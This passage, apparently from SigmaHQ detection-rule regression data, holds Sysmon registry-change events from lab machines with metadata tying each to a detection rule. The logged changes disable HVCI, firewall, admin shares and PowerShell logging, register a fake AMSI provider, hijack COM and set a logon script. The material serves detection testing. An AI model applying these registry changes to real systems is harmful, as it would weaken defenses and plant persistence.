    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:22:33.661127Z\"\n        }\n      },\n      \"EventRecordID\": 28528165,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:22:33.654\",\n      \"ProcessGuid\": \"5AA13A44-66E9-68FE-AC56-000000004002\",\n      \"ProcessId\": 7108,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\DeviceGuard\\\\Scenarios\\\\HypervisorEnforcedCodeIntegrity\\\\Enabled\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml",
    "content": "id: b60c9c4c-27e7-4870-af1d-f35582a44c07\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a\n      title: Windows Hypervisor Enforced Code Integrity Disabled\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:29:32.286061Z\"\n        }\n      },\n      \"EventRecordID\": 28656599,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:29:32.271\",\n      \"ProcessGuid\": \"5AA13A44-688C-68FE-D556-000000004002\",\n      \"ProcessId\": 2712,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\AutoShareServer\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:29:32.296086Z\"\n        }\n      },\n      \"EventRecordID\": 28656618,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:29:32.287\",\n      \"ProcessGuid\": \"5AA13A44-688C-68FE-D656-000000004002\",\n      \"ProcessId\": 368,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\AutoShareWks\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml",
    "content": "id: c99b67cd-0a57-4023-9f88-35806d622b48\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e\n      title: Disable Administrative Share Creation at Startup\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:36:31.269411Z\"\n        }\n      },\n      \"EventRecordID\": 28785637,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:36:31.258\",\n      \"ProcessGuid\": \"5AA13A44-6A2F-68FE-0857-000000004002\",\n      \"ProcessId\": 9720,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\PublicProfile\\\\EnableFirewall\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml",
    "content": "id: aa89a142-e72f-4b37-acd2-274ed81a1477\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 974515da-6cc5-4c95-ae65-f97f9150ec7f\n      title: Disable Microsoft Defender Firewall via Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T18:42:48.447971Z\"\n        }\n      },\n      \"EventRecordID\": 28901143,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 18:42:48.434\",\n      \"ProcessGuid\": \"5AA13A44-6BA8-68FE-2F57-000000004002\",\n      \"ProcessId\": 7476,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml",
    "content": "id: b5d83cd8-e1e5-459e-9f06-7c1e41a9bfeb\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6\n      title: Disable Windows Security Center Notifications\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:49:35.941239Z\"\n        }\n      },\n      \"EventRecordID\": 16380977,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:49:35.941\",\n      \"ProcessGuid\": \"5AA13A44-620F-68FD-9A3E-000000004002\",\n      \"ProcessId\": 9952,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\regsvr32.exe\",\n      \"TargetObject\": \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\{00000000-DEAD-DEAD-DEAD-B2B2E0859059}\\\\(Default)\",\n      \"Details\": \"FakeAmsi\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml",
    "content": "id: 825fc38f-ff54-4338-8016-6f3477c7aa8f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705\n      title: Potential Persistence Via New AMSI Providers - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:53:11.117530Z\"\n        }\n      },\n      \"EventRecordID\": 16447792,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:53:11.114\",\n      \"ProcessGuid\": \"5AA13A44-62E7-68FD-C13E-000000004002\",\n      \"ProcessId\": 8536,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\\\CLSID\\\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\\\TreatAs\\\\(Default)\",\n      \"Details\": \"{00000001-0000-0000-0000-0000FEEDACDC}\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml",
    "content": "id: 482ef6c8-3c2a-4b7b-a82e-b09f27576b96\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9b0f8a61-91b2-464f-aceb-0527e0a45020\n      title: Potential COM Object Hijacking Via TreatAs Subkey - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:56:33.715505Z\"\n        }\n      },\n      \"EventRecordID\": 16510574,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:56:33.705\",\n      \"ProcessGuid\": \"5AA13A44-63B1-68FD-D93E-000000004002\",\n      \"ProcessId\": 9452,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Environment\\\\UserInitMprLogonScript\",\n      \"Details\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\art.bat\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml",
    "content": "id: 84c6a082-3aa5-4387-b113-60415aeb9458\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 9ace0707-b560-49b8-b6ca-5148b42f39fb\n      title: Potential Persistence Via Logon Scripts - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-31T05:57:54.388692Z\"\n        }\n      },\n      \"EventRecordID\": 657715,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3080,\n          \"ThreadID\": 4948\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-31 05:57:54.387\",\n      \"ProcessGuid\": \"14207D89-4FE2-6904-D207-000000004002\",\n      \"ProcessId\": 5612,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\reg.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-1938467512-983293709-721003795-1103\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n      \"Details\": \"DWORD (0x00000000)\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml",
    "content": "id: a6c567e7-d5d4-494b-9a66-71fa87c44f8e\ndescription: N/A\ndate: 2025-10-31\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7\n      title: PowerShell Logging Disabled Via Registry Key Tampering\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:59:35.308812Z\"\n        }\n      },\n      \"EventRecordID\": 16567695,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:59:35.300\",\n      \"ProcessGuid\": \"5AA13A44-6465-68FD-EF3E-000000004002\",\n      \"ProcessId\": 7500,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\PsService.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Sysinternals\\\\PsService\\\\EulaAccepted\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml",
    "content": "id: 070ba0e3-b1e5-4fa9-9935-ca8a8c233b3d\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      title: PUA - Sysinternal Tool Execution - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T00:00:51.970813Z\"\n        }\n      },\n      \"EventRecordID\": 16592206,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-26 00:00:51.957\",\n      \"ProcessGuid\": \"5AA13A44-64B2-68FD-FB3E-000000004002\",\n      \"ProcessId\": 4776,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\FakeSysinternals.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Sysinternals\\\\PsService\\\\EulaAccepted\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml",
    "content": "id: a977324d-5006-46e6-bb1c-9d8b13344f00\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: f50f3c09-557d-492d-81db-9064a8d4e211\n      title: Suspicious Execution Of Renamed Sysinternals Tools - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 13,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 13,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T23:59:35.308812Z\"\n        }\n      },\n      \"EventRecordID\": 16567695,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"EventType\": \"SetValue\",\n      \"UtcTime\": \"2025-10-25 23:59:35.300\",\n      \"ProcessGuid\": \"5AA13A44-6465-68FD-EF3E-000000004002\",\n      \"ProcessId\": 7500,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\PsService.exe\",\n      \"TargetObject\": \"HKU\\\\S-1-5-21-3960063115-309473240-3247002503-500\\\\Software\\\\Sysinternals\\\\PsService\\\\EulaAccepted\",\n      \"Details\": \"DWORD (0x00000001)\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml",
    "content": "id: 55e4036d-e026-4110-bf9a-a1037f28edbb\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d\n      title: PUA - Sysinternals Tools Execution - Registry\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx\n"
  },
  {
